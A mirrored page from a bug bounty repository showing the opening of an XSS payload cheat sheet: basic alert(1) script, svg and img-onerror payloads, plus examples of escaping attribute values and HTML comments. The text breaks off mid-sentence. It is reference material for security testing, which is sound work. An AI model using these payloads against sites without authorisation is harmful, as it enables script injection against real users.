mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-24 21:35:25 +00:00
74b4c4b2eb
Add 3 tips
4.4 KiB
4.4 KiB
XSS Payloads
- Basic payload
<script>alert(1)</script>
<svg/onload=alert(1)>
<img src=x onerror=alert(1)>
- Add ' or " to escape the payload from value of an HTML tag
"><script>alert(1)</script>
'><script>alert(1)</script>
- Example source code
<input id="keyword" type="text" name="q" value="REFLECTED_HERE">
- After input the payload
<input id="keyword" type="text" name="q" value=""><script>alert(1)</script>
- Add --> to escape the payload if input lands in HTML comments.
--><script>alert(1)</script>
- Example source code
<!-- REFLECTED_HERE -->
- After input the payload
<!-- --><script>alert(1)</script> -->
- Add when the input inside or between opening/closing tags, tag can be ,<title, when input inside